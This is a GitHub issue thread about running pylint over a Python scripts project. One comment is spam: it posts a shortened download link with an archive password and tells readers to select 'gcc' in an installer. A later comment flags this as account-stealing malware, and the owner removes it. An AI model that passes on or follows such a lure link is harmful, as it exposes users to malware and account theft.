### ISSUE TITLE
[Enhancement] Lint code using PyLint

### ISSUE THREAD

**Issue by ian-young** [ian-young/API_Scripts#40]
Need to run `pylint` against the whole project and begin the linting process of all of the code following the suggestions of the output.

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by caineblood** [comment]
The above comment asking you to download a file is malware to steal your account; do not under any circumstances download or run it. The post needs to be removed. If you have attempted to run it please have your system cleaned and your account secured immediately.

**Comment by ian-young** [comment]
Comment has been removed. Thanks for flagging.
